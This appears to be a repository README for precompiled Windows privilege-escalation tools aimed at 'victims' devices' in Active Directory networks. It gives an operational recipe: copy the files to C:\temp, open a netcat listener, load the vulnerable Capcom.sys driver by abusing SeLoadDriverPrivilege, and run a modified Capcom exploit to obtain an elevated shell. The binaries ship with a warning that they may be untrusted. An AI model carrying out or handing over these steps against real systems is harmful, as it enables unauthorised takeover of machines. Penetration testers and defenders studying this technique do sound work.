# Windows Local Priv Esc
# Warning: Please do not trust any files off the internet, i am not responsible for any effects in your system 
# I have also provided the links for the original source code, so that you can compile them yourself.

Contains files for Windows Local Priv Esc in an AD environment.
This contains the compiled version of the codes

1) Gain a Local access to Victims device
2) Create a directory in victims device "C:\temp\"
3) Put all the given files into the "temp" folder
4) Initiate a netcat listen on your deivce "nc -lvnp [PORT]"
5) Run the below commands in the victims device from the temp folder
    $ .\EOPLOADDRIVER.exe System\CurrentControlSet\MyService C:\temp\capcom.sys
    $ .\ExploitCapcom_modded.exe
6) You gain a elivated shell access.    

Reference:
1) https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/
2) https://raw.githubusercontent.com/TarlogicSecurity/EoPLoadDriver/master/eoploaddriver.cpp
3) https://github.com/tandasat/ExploitCapcom
